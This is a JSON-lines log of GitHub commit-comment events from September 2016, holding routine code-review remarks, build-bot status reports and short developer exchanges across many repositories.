{"id":"4531174130","type":"CommitCommentEvent","actor":{"login":"adriansanmigel"},"repo":{"name":"adriansanmigel78/https-firebase.google.com-"},"payload":{"comment":{"id":18938294,"position":32,"line":32,"path":"MultiAuth Helper.html","commit_id":"70bcc2c6c1f5eefeff76968055687f1809ec0070","created_at":"2016-09-08T00:53:28Z","updated_at":"2016-09-08T00:53:28Z","body":"Permissions correct or update Network Status "}},"created_at":"2016-09-08T00:53:28Z"}
{"id":"4531174276","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18938296,"position":28,"line":28,"path":"run.ps1","commit_id":"948e2e428bea72140fcd0ec7fe075e2a16e6f34e","created_at":"2016-09-08T00:53:30Z","updated_at":"2016-09-08T00:53:30Z","body":"How do you expect other tools to be run on this version of the cli shared framework? For example GenFacades or ApiCompat which currently are ran via Exec tasks in our msbuild targets?"}},"created_at":"2016-09-08T00:53:30Z"}
{"id":"4531175691","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18938298,"position":null,"line":null,"path":null,"commit_id":"4c0b07c23e0d03fb325ab35f183d22426f97f090","created_at":"2016-09-08T00:53:57Z","updated_at":"2016-09-08T00:53:57Z","body":"@MichaelWallace30 \r\nI just fixed a small problem with linux. It's temporary (hopefully you may be able to find a better solution). The truncateCRC() function was truncating messages that were less than size length 4, so i put something to check if it's less than 4. It's probably because the messages are being sent incredibly fast (about 2 times per second)."}},"created_at":"2016-09-08T00:53:57Z"}
{"id":"4531175744","type":"CommitCommentEvent","actor":{"login":"jrevels"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18938299,"position":null,"line":null,"path":null,"commit_id":"8db40db6092e37d04160d80a6cd281a888a30e69","created_at":"2016-09-08T00:53:58Z","updated_at":"2016-09-08T00:53:58Z","body":"Looks like this commit [causes a segfault](https://github.com/JuliaCI/BaseBenchmarkReports/blob/726a4486aebd564c571e0d78479207240a52a614/8db40db_vs_2ab4a0d/logs/8db40db6092e37d04160d80a6cd281a888a30e69_primary.err) for BenchmarkTools."}},"created_at":"2016-09-08T00:53:58Z"}
{"id":"4531176801","type":"CommitCommentEvent","actor":{"login":"xubitao"},"repo":{"name":"aochuanliu/GrapInfoTool"},"payload":{"comment":{"id":18938300,"position":89,"line":79,"path":"GrapInfoTool.java","commit_id":"6d022247c79aba56a59cc843443c932e2551cf57","created_at":"2016-09-08T00:54:19Z","updated_at":"2016-09-08T00:54:19Z","body":"变量名不要用简写，`Elements`的对象名可以是`elements`."}},"created_at":"2016-09-08T00:54:19Z"}
{"id":"4531177538","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18938301,"position":null,"line":null,"path":null,"commit_id":"4c0b07c23e0d03fb325ab35f183d22426f97f090","created_at":"2016-09-08T00:54:34Z","updated_at":"2016-09-08T00:54:34Z","body":"@MichaelWallace30 \r\nBe sure to merge this branch to master before you do any more work."}},"created_at":"2016-09-08T00:54:34Z"}
{"id":"4531178646","type":"CommitCommentEvent","actor":{"login":"xubitao"},"repo":{"name":"aochuanliu/GrapInfoTool"},"payload":{"comment":{"id":18938307,"position":101,"line":91,"path":"GrapInfoTool.java","commit_id":"6d022247c79aba56a59cc843443c932e2551cf57","created_at":"2016-09-08T00:54:57Z","updated_at":"2016-09-08T00:54:57Z","body":"没用的代码可以大方的删掉，后续需要时可以通过版本管理找回，保持代码干净。"}},"created_at":"2016-09-08T00:54:57Z"}
{"id":"4531181177","type":"CommitCommentEvent","actor":{"login":"xubitao"},"repo":{"name":"aochuanliu/GrapInfoTool"},"payload":{"comment":{"id":18938312,"position":128,"line":118,"path":"GrapInfoTool.java","commit_id":"6d022247c79aba56a59cc843443c932e2551cf57","created_at":"2016-09-08T00:55:43Z","updated_at":"2016-09-08T00:55:43Z","body":"测试代码应该和你的业务代码分离开，不要混在一起。"}},"created_at":"2016-09-08T00:55:43Z"}
{"id":"4531182018","type":"CommitCommentEvent","actor":{"login":"DougVonMoser"},"repo":{"name":"nrod80/seat-optimization"},"payload":{"comment":{"id":18938315,"position":null,"line":null,"path":null,"commit_id":"7c3f01161e8b631b1bef509016ecea13ce62a5bc","created_at":"2016-09-08T00:55:59Z","updated_at":"2016-09-08T00:55:59Z","body":"Brilliant sending a .slice of currentSeats through the tests rather than the original"}},"created_at":"2016-09-08T00:55:59Z"}
{"id":"4531183325","type":"CommitCommentEvent","actor":{"login":"xubitao"},"repo":{"name":"aochuanliu/GrapInfoTool"},"payload":{"comment":{"id":18938319,"position":113,"line":103,"path":"GrapInfoTool.java","commit_id":"6d022247c79aba56a59cc843443c932e2551cf57","created_at":"2016-09-08T00:56:26Z","updated_at":"2016-09-08T00:56:26Z","body":"一个文件内尽量保持一个类。"}},"created_at":"2016-09-08T00:56:26Z"}
{"id":"4531185263","type":"CommitCommentEvent","actor":{"login":"xubitao"},"repo":{"name":"aochuanliu/GrapInfoTool"},"payload":{"comment":{"id":18938323,"position":null,"line":null,"path":null,"commit_id":"6d022247c79aba56a59cc843443c932e2551cf57","created_at":"2016-09-08T00:57:05Z","updated_at":"2016-09-08T00:57:05Z","body":"不要提交单个文件，可以把整个工程提交上来。"}},"created_at":"2016-09-08T00:57:05Z"}
{"id":"4531187820","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18938327,"position":null,"line":null,"path":null,"commit_id":"8db40db6092e37d04160d80a6cd281a888a30e69","created_at":"2016-09-08T00:57:53Z","updated_at":"2016-09-08T00:57:53Z","body":"Probably the commits on this branch in general and not this commit"}},"created_at":"2016-09-08T00:57:53Z"}
{"id":"4531209579","type":"CommitCommentEvent","actor":{"login":"suthsc"},"repo":{"name":"suthsc/vagrant_minecraft"},"payload":{"comment":{"id":18938364,"position":null,"line":null,"path":null,"commit_id":"2e2ffce3711b7c426be4eefc36cdd26c9b6aa6fa","created_at":"2016-09-08T01:04:55Z","updated_at":"2016-09-08T01:04:55Z","body":"@42antoine Sorry for letting this languish for so long. I'll get a PR created.."}},"created_at":"2016-09-08T01:04:55Z"}
{"id":"4531210320","type":"CommitCommentEvent","actor":{"login":"naomijub"},"repo":{"name":"salvadorc17/SNESGoofTroop"},"payload":{"comment":{"id":18938365,"position":null,"line":null,"path":null,"commit_id":"cf0326711eda6d05337bc8809aa4bfef7ad061fd","created_at":"2016-09-08T01:05:10Z","updated_at":"2016-09-08T01:05:10Z","body":"Nice"}},"created_at":"2016-09-08T01:05:10Z"}
{"id":"4531211617","type":"CommitCommentEvent","actor":{"login":"fukushiro-sumire"},"repo":{"name":"fukushiro-sumire/ToDoList"},"payload":{"comment":{"id":18938366,"position":null,"line":null,"path":null,"commit_id":"4877cc8354bde4cd9b87ec9962cef39a5848ca89","created_at":"2016-09-08T01:05:34Z","updated_at":"2016-09-08T01:05:34Z","body":"https://frozen-sands-36680.herokuapp.com/tasks"}},"created_at":"2016-09-08T01:05:34Z"}
{"id":"4531217954","type":"CommitCommentEvent","actor":{"login":"wigginst"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18938375,"position":null,"line":null,"path":null,"commit_id":"448511eb45c4ed8544bfc43a6c2e5130f72494a1","created_at":"2016-09-08T01:07:41Z","updated_at":"2016-09-08T01:07:41Z","body":"Heh. My mistake. I thought you were trying to say the plural of 'moment'. Never mind, carry on."}},"created_at":"2016-09-08T01:07:41Z"}
{"id":"4531218120","type":"CommitCommentEvent","actor":{"login":"chrisdpeters"},"repo":{"name":"cfwheels/cfwheels"},"payload":{"comment":{"id":18938376,"position":null,"line":null,"path":null,"commit_id":"94d2a183ba0a329f488f33f67fdf6b385e1e0b79","created_at":"2016-09-08T01:07:44Z","updated_at":"2016-09-08T01:07:44Z","body":"#613"}},"created_at":"2016-09-08T01:07:44Z"}
{"id":"4531220301","type":"CommitCommentEvent","actor":{"login":"MatthewJA"},"repo":{"name":"chengsoonong/crowdastro"},"payload":{"comment":{"id":18938381,"position":null,"line":null,"path":null,"commit_id":"9bd5e390147107625028a2a86e684ea36f38500a","created_at":"2016-09-08T01:08:30Z","updated_at":"2016-09-08T01:08:30Z","body":"@chengsoonong: I don't think we have `pyyaml`."}},"created_at":"2016-09-08T01:08:30Z"}
{"id":"4531221000","type":"CommitCommentEvent","actor":{"login":"karaBASSbaraBASS"},"repo":{"name":"karaBASSbaraBASS/bombs-game"},"payload":{"comment":{"id":18938382,"position":69,"line":69,"path":"bombs.js","commit_id":"2630998aeba9a40a0eff89c5e11069c21d70ea8c","created_at":"2016-09-08T01:08:46Z","updated_at":"2016-09-08T01:08:46Z","body":"dfdsf"}},"created_at":"2016-09-08T01:08:46Z"}
{"id":"4531227027","type":"CommitCommentEvent","actor":{"login":"davetcoleman"},"repo":{"name":"ros-planning/moveit_tutorials"},"payload":{"comment":{"id":18938385,"position":10,"line":66,"path":"index.rst","commit_id":"ce1a92db2eafd1ffcd26311112451fae2cb66afd","created_at":"2016-09-08T01:10:52Z","updated_at":"2016-09-08T01:10:52Z","body":"for now lets just keep this under the \"Advanced\" section"}},"created_at":"2016-09-08T01:10:52Z"}
{"id":"4531230582","type":"CommitCommentEvent","actor":{"login":"debop"},"repo":{"name":"debop/hibernate-redis"},"payload":{"comment":{"id":18938388,"position":null,"line":null,"path":null,"commit_id":"6f7aaa0e04980f4667b5b0a24bd309167887aaf7","created_at":"2016-09-08T01:12:10Z","updated_at":"2016-09-08T01:12:10Z","body":"OK, I will remove logback at next release"}},"created_at":"2016-09-08T01:12:10Z"}
{"id":"4531237372","type":"CommitCommentEvent","actor":{"login":"carlosMurilloRestrepo"},"repo":{"name":"carlosMurilloRestrepo/inteligencia"},"payload":{"comment":{"id":18938397,"position":null,"line":null,"path":null,"commit_id":"cc55b8c1450ad0fe25da618fdeb394e246be37cc","created_at":"2016-09-08T01:14:33Z","updated_at":"2016-09-08T01:14:33Z","body":"carlos"}},"created_at":"2016-09-08T01:14:33Z"}
{"id":"4531237935","type":"CommitCommentEvent","actor":{"login":"carlosMurilloRestrepo"},"repo":{"name":"carlosMurilloRestrepo/inteligencia"},"payload":{"comment":{"id":18938398,"position":null,"line":null,"path":null,"commit_id":"cc55b8c1450ad0fe25da618fdeb394e246be37cc","created_at":"2016-09-08T01:14:46Z","updated_at":"2016-09-08T01:14:46Z","body":"trabajo1"}},"created_at":"2016-09-08T01:14:46Z"}
{"id":"4531238773","type":"CommitCommentEvent","actor":{"login":"cuducos"},"repo":{"name":"datasciencebr/jarbas"},"payload":{"comment":{"id":18938400,"position":null,"line":null,"path":null,"commit_id":"69a54131e22e38a6f7cfe45944a0bd06fd45e4d2","created_at":"2016-09-08T01:15:03Z","updated_at":"2016-09-08T01:15:03Z","body":"Fix #5 "}},"created_at":"2016-09-08T01:15:03Z"}
{"id":"4531239756","type":"CommitCommentEvent","actor":{"login":"dagit"},"repo":{"name":"dagit/mattermost-api"},"payload":{"comment":{"id":18938401,"position":null,"line":null,"path":null,"commit_id":"62cda538c8b2534e7a8fcbd255e1864f7b483f18","created_at":"2016-09-08T01:15:24Z","updated_at":"2016-09-08T01:15:24Z","body":"Yay!"}},"created_at":"2016-09-08T01:15:24Z"}
{"id":"4531240308","type":"CommitCommentEvent","actor":{"login":"HarshaLaxman"},"repo":{"name":"coala-analyzer/coala-bears"},"payload":{"comment":{"id":18938403,"position":null,"line":null,"path":null,"commit_id":"cc9019cc87e5dfb2e1a30500a242bbf4ea431379","created_at":"2016-09-08T01:15:35Z","updated_at":"2016-09-08T01:15:35Z","body":"Added row at the top to contain C, and shifted to bottom row to fill in the top. Maintains alphabetical order.\r\n\r\nCloses #481"}},"created_at":"2016-09-08T01:15:35Z"}
{"id":"4531241158","type":"CommitCommentEvent","actor":{"login":"romeo27091985"},"repo":{"name":"romeo27091985/---"},"payload":{"comment":{"id":18938404,"position":null,"line":null,"path":null,"commit_id":"637c6280e87c9cbfcbcf5036b52e2275eae09e84","created_at":"2016-09-08T01:15:52Z","updated_at":"2016-09-08T01:15:52Z","body":"\r\n\r\n\r\n[message_TS.pdf](https://github.com/romeo27091985/---/files/460633/message_TS.pdf)\r\n"}},"created_at":"2016-09-08T01:15:52Z"}
{"id":"4531241201","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938405,"position":null,"line":null,"path":null,"commit_id":"0d243ddef4d84dd259ab2a5dd2eee5df37a7a0bc","created_at":"2016-09-08T01:15:53Z","updated_at":"2016-09-08T01:15:53Z","body":"So all these new 'catch' clauses seem to be just a partial implementation.  When we encounter contradictory assumptions, shouldn't we try to \"cut\" the branch that led us there?  For example, shouldn't assert-deny throw an exception, to let the caller know they were about to create an inconsistent KB?  assert-deny itself doesn't know what to do, but the last thing it should do is blindly create an inconsistent KB!  Better if it simply returned `KB(Constrain(false))`, no?"}},"created_at":"2016-09-08T01:15:53Z"}
{"id":"4531242545","type":"CommitCommentEvent","actor":{"login":"marcae777"},"repo":{"name":"marcae777/hello-world"},"payload":{"comment":{"id":18938409,"position":null,"line":null,"path":null,"commit_id":"2af8ecd05742417b0d6332dabf21f5d0db20c0fb","created_at":"2016-09-08T01:16:22Z","updated_at":"2016-09-08T01:16:22Z","body":"hello bitches"}},"created_at":"2016-09-08T01:16:22Z"}
{"id":"4531242782","type":"CommitCommentEvent","actor":{"login":"oleavr"},"repo":{"name":"nowsecure/frida-cycript"},"payload":{"comment":{"id":18938410,"position":null,"line":null,"path":null,"commit_id":"329682b3187da4b856e83c95536525a73643697e","created_at":"2016-09-08T01:16:26Z","updated_at":"2016-09-08T01:16:26Z","body":"Thanks for clarifying. My understanding was correct then, which is why I bundled Bison 3.0.4 due to the assumptions made about its output (I discovered this when porting it to Windows/MSVC and having an older 3.x release of Bison). Build system tweaks are worth maintaining and is not what I was talking about, i.e. I don't plan on changing the compiler."}},"created_at":"2016-09-08T01:16:26Z"}
{"id":"4531247065","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938416,"position":null,"line":null,"path":null,"commit_id":"18471743926470e6981d3ca0f07bd259df846441","created_at":"2016-09-08T01:17:56Z","updated_at":"2016-09-08T01:17:56Z","body":"Hmm, I wonder why we had these calls there to begin with, and why they are now no longer needed.  Perhaps our test suite is too small?"}},"created_at":"2016-09-08T01:17:56Z"}
{"id":"4531249001","type":"CommitCommentEvent","actor":{"login":"bmneely"},"repo":{"name":"matib05/bloc-jams"},"payload":{"comment":{"id":18938420,"position":25,"line":199,"path":"scripts/album.js","commit_id":"a2e5cf566740984615cbed523c4d1fd2798f9340","created_at":"2016-09-08T01:18:36Z","updated_at":"2016-09-08T01:18:36Z","body":"You'll want to remove these console logs."}},"created_at":"2016-09-08T01:18:36Z"}
{"id":"4531249344","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938424,"position":null,"line":null,"path":null,"commit_id":"0d243ddef4d84dd259ab2a5dd2eee5df37a7a0bc","created_at":"2016-09-08T01:18:45Z","updated_at":"2016-09-08T01:18:45Z","body":"Yes. I suspect it's better for the interface of `assert` to say that it either returns a KB or reports inconsistency. Currently the interface of `assert` says it always returns a KB. I suspect we should not treat inconsistency as a KB."}},"created_at":"2016-09-08T01:18:45Z"}
{"id":"4531250094","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"TiagoRezende/trabalho02"},"payload":{"comment":{"id":18938425,"position":null,"line":null,"path":null,"commit_id":"d93d74787335c3dc0daa196fe0acf43ef00da7af","created_at":"2016-09-08T01:19:02Z","updated_at":"2016-09-08T01:19:02Z","body":"Ok. O código pode ser com a extensão `.lua` mesmo..."}},"created_at":"2016-09-08T01:19:02Z"}
{"id":"4531252574","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18938429,"position":null,"line":null,"path":null,"commit_id":"94f7a1033dc591525ca6e85a2fb02b11d4d12323","created_at":"2016-09-08T01:19:56Z","updated_at":"2016-09-08T01:19:56Z","body":"128792325-Issue5803 (wfbuhl) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-08T01:19:56Z"}
{"id":"4531255134","type":"CommitCommentEvent","actor":{"login":"dennisss"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18938434,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-08T01:20:52Z","updated_at":"2016-09-08T01:20:52Z","body":"@davids5, that fixed it! Can't find any other issues with this branch so far."}},"created_at":"2016-09-08T01:20:52Z"}
{"id":"4531261789","type":"CommitCommentEvent","actor":{"login":"davids5"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18938441,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-08T01:23:20Z","updated_at":"2016-09-08T01:23:20Z","body":"@dennisss - yeah!\r\n\r\nI love the device and the video!\r\n\r\n"}},"created_at":"2016-09-08T01:23:20Z"}
{"id":"4531262286","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938442,"position":null,"line":null,"path":null,"commit_id":"18471743926470e6981d3ca0f07bd259df846441","created_at":"2016-09-08T01:23:31Z","updated_at":"2016-09-08T01:23:31Z","body":"One rough intuition is that the input to these calls have already been simplified enough."}},"created_at":"2016-09-08T01:23:31Z"}
{"id":"4531263703","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938445,"position":null,"line":null,"path":null,"commit_id":"8b5a8f9bd5b4ad49e69a5c4f0c04a4c48f3b1feb","created_at":"2016-09-08T01:24:05Z","updated_at":"2016-09-08T01:24:05Z","body":"So the old code performed `f` in a context (via `assuming`) where a bunch of assumptions where made.  Now f is called 'raw'.  I am quite surprised this causes no test failures.  Perhaps this only causes slowdowns?\r\n\r\nI think I remember that this was put in place so that some integrals (done via `banish`) were done in such a way that no `csgn` was generated.  The way it is done now, the big, ugly integral with `csgn` might get generated then simplified away.  That's usually more expensive."}},"created_at":"2016-09-08T01:24:05Z"}
{"id":"4531267792","type":"CommitCommentEvent","actor":{"login":"soukakei"},"repo":{"name":"soukakei/work001"},"payload":{"comment":{"id":18938454,"position":null,"line":null,"path":null,"commit_id":"554e3f565967bf55a41c6d9743b5a89a1f845d14","created_at":"2016-09-08T01:25:27Z","updated_at":"2016-09-08T01:25:27Z","body":"image "}},"created_at":"2016-09-08T01:25:27Z"}
{"id":"4531269471","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18938455,"position":null,"line":null,"path":null,"commit_id":"4c0b07c23e0d03fb325ab35f183d22426f97f090","created_at":"2016-09-08T01:26:02Z","updated_at":"2016-09-08T01:26:02Z","body":"Yeah thats bad data i should slow it down."}},"created_at":"2016-09-08T01:26:02Z"}
{"id":"4531270250","type":"CommitCommentEvent","actor":{"login":"flyjwayur"},"repo":{"name":"Rookies-RGSOC2016/Riot.js-Learning"},"payload":{"comment":{"id":18938457,"position":29,"line":40,"path":"tags/apps-container.tag","commit_id":"fc8a2e5541ebec4df8767d7969a41b45c0883ab5","created_at":"2016-09-08T01:26:19Z","updated_at":"2016-09-08T01:26:19Z","body":"@gr2m @titay2 Hey ;) I was trying to use 'findAll()' function here from indexApi.js by giving a link '<script src=\"scripts/indexApi.js\"></script>' in index.html. But in console, it says 'Uncaught TypeError: $appList.findAll is not a function'. I wonder how I can solve this error, moving on one little step. "}},"created_at":"2016-09-08T01:26:19Z"}
{"id":"4531270278","type":"CommitCommentEvent","actor":{"login":"scottmessinger"},"repo":{"name":"quilljs/quill"},"payload":{"comment":{"id":18938458,"position":null,"line":null,"path":null,"commit_id":"904043cb326a930548bc76a26f8a4694d99dce94","created_at":"2016-09-08T01:26:19Z","updated_at":"2016-09-08T01:26:19Z","body":"Awesome! Thanks so much!"}},"created_at":"2016-09-08T01:26:19Z"}
{"id":"4531272819","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18938461,"position":null,"line":null,"path":null,"commit_id":"157b17cef79b6d34518d38355588122b607402a6","created_at":"2016-09-08T01:27:16Z","updated_at":"2016-09-08T01:27:16Z","body":"Actually that could have fixed it, but I thought making it a constant (as we are probably not changing the integer values anyway) would be a good decision "}},"created_at":"2016-09-08T01:27:16Z"}
{"id":"4531273542","type":"CommitCommentEvent","actor":{"login":"Dawnbrightsu"},"repo":{"name":"Dawnbrightsu/FusionCMS"},"payload":{"comment":{"id":18938462,"position":null,"line":null,"path":null,"commit_id":"0aad83fe59e25352f71672ad46d199f113fa0587","created_at":"2016-09-08T01:27:31Z","updated_at":"2016-09-08T01:27:31Z","body":"@DkVagabonden \r\nYes it is 4.x"}},"created_at":"2016-09-08T01:27:31Z"}
{"id":"4531276159","type":"CommitCommentEvent","actor":{"login":"AnaelMobilia"},"repo":{"name":"AnaelMobilia/NextINpact-Unofficial"},"payload":{"comment":{"id":18938469,"position":null,"line":null,"path":null,"commit_id":"a0dfe5d7a46e151fba6755df0a5f0817382b9f8f","created_at":"2016-09-08T01:28:27Z","updated_at":"2016-09-08T01:28:27Z","body":"Close #173 "}},"created_at":"2016-09-08T01:28:27Z"}
{"id":"4531277476","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938472,"position":null,"line":null,"path":null,"commit_id":"0d243ddef4d84dd259ab2a5dd2eee5df37a7a0bc","created_at":"2016-09-08T01:28:54Z","updated_at":"2016-09-08T01:28:54Z","body":"Agreed."}},"created_at":"2016-09-08T01:28:54Z"}
{"id":"4531277834","type":"CommitCommentEvent","actor":{"login":"codebio"},"repo":{"name":"fomdesis/tinjaca"},"payload":{"comment":{"id":18938474,"position":null,"line":null,"path":null,"commit_id":"9d27e2c761eec7de51e5883345a81dea74dae641","created_at":"2016-09-08T01:29:02Z","updated_at":"2016-09-08T01:29:02Z","body":"### Comprobando registro DNS con el sigiente comando:\r\n`$ dig sistemas.fomdes.gob.ve +nostats +nocomments +nocmd`\r\nsalida:\r\n```\r\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> sistemas.fomdes.gob.ve +nostats +nocomments +nocmd\r\n;; global options: +cmd\r\n;sistemas.fomdes.gob.ve.\t\tIN\tA\r\nsistemas.fomdes.gob.ve.\t3600\tIN\tCNAME\tfomdesis.github.io.\r\nfomdesis.github.io.\t3600\tIN\tCNAME\tgithub.map.fastly.net.\r\ngithub.map.fastly.net.\t1714\tIN\tCNAME\tprod.github.map.fastlylb.net.\r\nprod.github.map.fastlylb.net. 16 IN\tA\t151.101.4.133\r\n```"}},"created_at":"2016-09-08T01:29:02Z"}
{"id":"4531282255","type":"CommitCommentEvent","actor":{"login":"oeoeaio"},"repo":{"name":"openfoodfoundation/openfoodnetwork"},"payload":{"comment":{"id":18938482,"position":null,"line":null,"path":null,"commit_id":"e5afdb5bf41a1138706c53ae18e843358ccb1b63","created_at":"2016-09-08T01:30:31Z","updated_at":"2016-09-08T01:30:31Z","body":"Hiya @lin-d-hop, did you mean to push this into master? I am assuming not, so I have rolled master back to #261a574, and have pushed this merge commit or yours into a branch called lynne-rollback."}},"created_at":"2016-09-08T01:30:31Z"}
{"id":"4531282716","type":"CommitCommentEvent","actor":{"login":"1ec5"},"repo":{"name":"mapbox/mapbox-gl-native"},"payload":{"comment":{"id":18938484,"position":5,"line":34,"path":"platform/darwin/src/NSExpression+MGLAdditions.mm","commit_id":"7e208c46cebe5b49d4b7ead9826bbe4229ebabd3","created_at":"2016-09-08T01:30:38Z","updated_at":"2016-09-08T01:30:38Z","body":"This broke Boolean conversions on 32-bit systems such as iPad 2. See https://github.com/mapbox/mapbox-gl-native/pull/6290#discussion_r77933624 for further discussion."}},"created_at":"2016-09-08T01:30:38Z"}
{"id":"4531283703","type":"CommitCommentEvent","actor":{"login":"silas"},"repo":{"name":"silas/node-consul"},"payload":{"comment":{"id":18938489,"position":null,"line":null,"path":null,"commit_id":"618a00c8929034af745a9f464627d439582a73c4","created_at":"2016-09-08T01:30:58Z","updated_at":"2016-09-08T01:30:58Z","body":"No good reason, I don't plan on changing the interface and anything. Mostly just hedging my bets until it had been around for a while and people had a chance to report issues.\r\n\r\nThe current lock implementation only supports the leader election strategy as described [here](https://www.consul.io/docs/guides/leader-election.html). I'd also like to implement [semaphores](https://www.consul.io/docs/guides/semaphore.html) at some point.\r\n\r\nThere is no way to use the builtin consul locks (that I'm aware of) without a session, although you could easily use a `kv.set` with `cas` (see [Consul API docs](https://www.consul.io/docs/agent/http/kv.html) `PUT method` for more information) if you don't care about liveness or are going to handle it yourself. "}},"created_at":"2016-09-08T01:30:58Z"}
{"id":"4531283850","type":"CommitCommentEvent","actor":{"login":"ishitatsuyuki"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18938490,"position":null,"line":null,"path":null,"commit_id":"f44afc854de480f842c2e702bd237b9ba473e07c","created_at":"2016-09-08T01:31:01Z","updated_at":"2016-09-08T01:31:01Z","body":"@PeratX some Chinese users can't read English, and others can access Google services. "}},"created_at":"2016-09-08T01:31:01Z"}
{"id":"4531284147","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938491,"position":null,"line":null,"path":null,"commit_id":"18471743926470e6981d3ca0f07bd259df846441","created_at":"2016-09-08T01:31:09Z","updated_at":"2016-09-08T01:31:09Z","body":"That makes sense.  Maybe that should be documented?"}},"created_at":"2016-09-08T01:31:09Z"}
{"id":"4531285655","type":"CommitCommentEvent","actor":{"login":"dagood"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18938493,"position":34,"line":34,"path":"bootstrap.ps1","commit_id":"948e2e428bea72140fcd0ec7fe075e2a16e6f34e","created_at":"2016-09-08T01:31:39Z","updated_at":"2016-09-08T01:31:39Z","body":"A direct equivalent is to use https://www.visualstudio.com/en-us/docs/integrate/api/git/items with basic auth using a VSTS PAT.  I tried it out, and it worked fine to get the contents of a file in the trusted buildtools repo."}},"created_at":"2016-09-08T01:31:39Z"}
{"id":"4531287050","type":"CommitCommentEvent","actor":{"login":"ishitatsuyuki"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18938494,"position":null,"line":null,"path":null,"commit_id":"fa5852f78714b2c72a445675f06df06fcf16fc14","created_at":"2016-09-08T01:32:09Z","updated_at":"2016-09-08T01:32:09Z","body":"Hey,  **freenode**"}},"created_at":"2016-09-08T01:32:09Z"}
{"id":"4531289201","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938495,"position":null,"line":null,"path":null,"commit_id":"8b5a8f9bd5b4ad49e69a5c4f0c04a4c48f3b1feb","created_at":"2016-09-08T01:32:54Z","updated_at":"2016-09-08T01:32:54Z","body":"When `f` is either `ints` or `sums`, the context is passed to `f` as an extra KB argument -- note on lines 931 and 935 that the calls to `do_elim_intsum` supply 7 arguments, not 4. So in `do_elim_intsum` we have 3 arguments in `_rest`, so `ints` or `sums` gets 5 arguments, so `Loop:-intssums` gets 7 arguments, including `kb`.\r\n\r\nWhen `f` is `int` or `sum`, what you say could be relevant. Here's the kind of integral:\r\n```\r\n> int(exp(-x^2/s^2),x=-infinity..infinity);             \r\npiecewise(csgn(1/s^2) = 1,csgn(1/s)*s*Pi^(1/2),infinity)\r\n> int(exp(-x^2/s^2),x=-infinity..infinity) assuming s>0;\r\ns*Pi^(1/2)\r\n```\r\nOf course even with the `assuming s>0` the function `csgn` is still called."}},"created_at":"2016-09-08T01:32:54Z"}
{"id":"4531291798","type":"CommitCommentEvent","actor":{"login":"OnionDoughnut"},"repo":{"name":"OnionDoughnut/C-Git"},"payload":{"comment":{"id":18938497,"position":null,"line":null,"path":null,"commit_id":"141be1ed4925f288cc4eaefd1690a5d7f5dd9571","created_at":"2016-09-08T01:33:51Z","updated_at":"2016-09-08T01:33:51Z","body":"C ++ git"}},"created_at":"2016-09-08T01:33:51Z"}
{"id":"4531293955","type":"CommitCommentEvent","actor":{"login":"RockNewbee"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18938501,"position":null,"line":null,"path":null,"commit_id":"a054fb1e048720760ba5345795cbb42821cacb99","created_at":"2016-09-08T01:34:35Z","updated_at":"2016-09-08T01:34:35Z","body":"but it still does not work\r\n"}},"created_at":"2016-09-08T01:34:35Z"}
